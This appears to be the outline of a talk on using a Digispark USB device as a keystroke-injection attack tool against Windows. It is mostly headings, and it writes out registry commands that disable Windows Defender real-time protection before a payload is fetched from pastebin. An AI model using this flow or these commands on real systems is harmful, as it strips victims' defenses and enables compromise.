Prerequisites
Download Arduino IDE - https://www.arduino.cc/en/Main/Software
Setup IDE for DIGISPARK
File -> Preferences ->
https://raw.githubusercontent.com/digistump/arduino-boards-index/master/package_digistump_index.json
Boards -> Board Manager -> Select Contributed -> Digistump AVR Boards by DigiStump -> Install
Alternatively can setup by downloading drivers and installing manually
In Tools-> Boards-> BoardManager -> select Digispark(default~16.5 Mhz)
Using a library, link given below-
Keys are defined in the following way
Flow of the Script
Method 1 - Using the GUI navigation
Method 2 - GUI is boring , Lets' use Powershell
Minimizing all windows
Hitting the Windows button
Typing powershell
Running as root
Command to disable firewall
Editing the Registry
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"
Editing Registry
Downloading & installing payload on the victim.
Steps
Web Connection
Downloading the file from pastebin
Launching the payload
Our Script is Ready... Time to detonate
You can reach me on:
LinkedIn: pankaj-kumar-singh
Twitter: @pankaj08123
Medium : @pankajkumarsingh_1954
Slides link: https://slides.com/pankajkumarsingh/deck-1